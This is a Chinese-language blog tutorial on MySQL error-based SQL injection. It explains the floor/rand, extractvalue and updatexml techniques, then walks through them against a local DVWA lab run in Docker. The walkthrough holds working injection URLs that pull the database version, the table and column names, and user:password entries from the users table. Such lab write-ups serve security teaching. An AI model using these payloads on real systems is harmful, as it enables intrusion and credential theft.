美文网首页
SQL报错注入

SQL报错注入

作者: 一生逍遥一生 | 来源:发表于2023-03-18 11:22 被阅读0次

    SQL报错注入: 使用SQL语句报错的语法,用于注入结果无回回显但错误信息有输出的情况。
    MySQL报错注入主要分为一下几类:

    1.BigInt等数据类型溢出;
    2.Xpath语法错误;
    3.count()+rand()+group_by()导致重复;
    4.空间数据类型函数错误。
    

    很多函数会导致MySQL报错并显示出数据:

    1.floor函数:返回小于等该值的最大整数。floor(rand(0)*2)报错是有条件的,记录必须3条以上
    2.extractvalue函数(最多32字符):使用xpath的语法从xml字符串中获取数据,使用concat函数将想要获得的数据库内容拼接到第二个参数中,报错时作为内容输出。
    3.updatexml函数:返回被替换的xml片段,updatexml中存在特殊字符、字母时,会出现报错,报错信息为特殊字符、字母及之后的内容,而hex出的数据包含字母和数字,所以第一个字母前面的内容都会丢失,常与concat组合使用。
    4.exp函数。
    

    select count(),(floor(rand(0)2)) as x tables group by x;为什么会报错?
    rand()在执行的时候,都会重新计算,会产生不同的数据,在语句的后面使用group by,整个表的数据是按照rand()生成的数据为主键,而插入到临时表中,如果碰到生成(floor(rand(0)*2)) as x的数据和表中的数据重复,就会造成主键重复的报错。

    dvwa环境搭建

    docker search web-dvwa
    docker pull vulnerables/web-dvwa
    docker run -d -p 12346:80 vulnerables/web-dvwa
    

    在启动环境之后,输入用户名(admin)和密码(password),登录到系统,进入启动界面,在页面有一个create/reset database 按钮,点击之后,就可以重新登录到页面:


    image.png
    重新登录系统之后,选择SQL Injection(Bind),进入盲注页面, image.png
    在页面中,直接点击提交按钮,页面返回在数据库中没有找到相应的userid,可以尝试有盲注的可能性,
    image.png

    通过常用盲注的方式,可以进行简单测试,是否可以进行盲注。使用上面提到的方式进行盲注的测试:

    http://localhost:12346/vulnerabilities/sqli/?id=1' and extractvalue(1,(select @@version)) -- &Submit=Submit#
    
    image.png

    通过extractvalue函数获取到数据库的版本,使用concat将用户和数据库信息拼接到一起,在使用extractvalue 获取到数据,

    http://localhost:12346/vulnerabilities/sqli/?id=1' and extractvalue(1, concat(0x7e, 
    (select user()),0x7e,(select database()))) --  &Submit=Submit#
    
    image.png

    可以获取到用户和数据库,从数据库中获取到数据表,以及获取到相应的数据:

    http://localhost:12346/vulnerabilities/sqli/?id=1' and extractvalue(1, concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --  &Submit=Submit#
    
    image.png
    http://localhost:12346/vulnerabilities/sqli/?id=1' and extractvalue(1, concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) --  &Submit=Submit#
    
    image.png

    从图中可以看到输出的数据不完整,可以借助limit来获取每一个属性的名称:

    http://localhost:12346/vulnerabilities/sqli/?id=1' and extractvalue(1, concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 0,1))) --  &Submit=Submit#
    
    image.png

    可以得到users表的字段为:[user_id,first_name,last_name,user,password,avatar,last_login,failed_login]
    通过上面的字段可以猜测出来,用户的信息,应该存放在user和password两个字段中,

    http://localhost:12346/vulnerabilities/sqli/?id=1' and extractvalue(1, concat(0x7e, (select 
    concat_ws(':',user,password) from dvwa.users limit 0,1))) --  &Submit=Submit#
    
    image.png

    这样获取到的数据有可能会超过字符串长度,需要使用mid函数,

    http://localhost:12346/vulnerabilities/sqli/?id=1' and extractvalue(1, mid(concat(0x7e, (select password from dvwa.users limit 0,1)),1,29)) --  &Submit=Submit#
    
    image.png

    可以看到获取password的数据,有可能会超过长度限制进行截取,可以多次获取,然后将字段进行拼接,


    image.png

    相关文章

      网友评论

          本文标题:SQL报错注入

          本文链接:https://www.haomeiwen.com/subject/xtjjrdtx.html